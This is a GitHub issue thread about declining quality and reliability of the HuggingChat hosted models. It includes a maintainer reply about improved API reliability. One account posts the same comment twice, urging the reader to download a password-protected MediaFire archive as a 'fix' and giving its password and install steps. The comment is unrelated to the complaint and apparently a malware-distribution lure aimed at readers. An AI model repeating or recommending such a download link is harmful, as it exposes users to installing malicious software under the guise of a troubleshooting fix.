### ISSUE TITLE
Massive drop in quality of hugchat LLMs

### ISSUE THREAD

**Issue by s1nistr4** [huggingface/chat-ui#1444]
Almost none of the LLMs offered in huggingchat work. C4ai frequently gives irrelevant, unhelpful results like broken code. The continue button doesn't work in Llama, it just lags and crashes the AI. Mistral-7B is really bad at reading prompts and gives incorrect answers to things. Nous Hermes just lags on any prompt and doesn't work. 

I get that running AI takes resources, so if this is being ran as a loss of you, charge money for them. A $10-20 subscription fee for 7 uncensored LLMs that can also be used in scripts is 100% worth it. It would be better to charge money for them and have them work than to make them free and have them so many issues that you're just costing Hugchat needless computing resources.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nsarrazin** [comment]
Hey, we worked on improving API reliability so hopefully things should be better now. But in the future please open discussions about huggingchat here: https://huggingface.co/spaces/huggingchat/chat-ui/discussions

Issues here are about the codebase itself not the hosted service :smile:
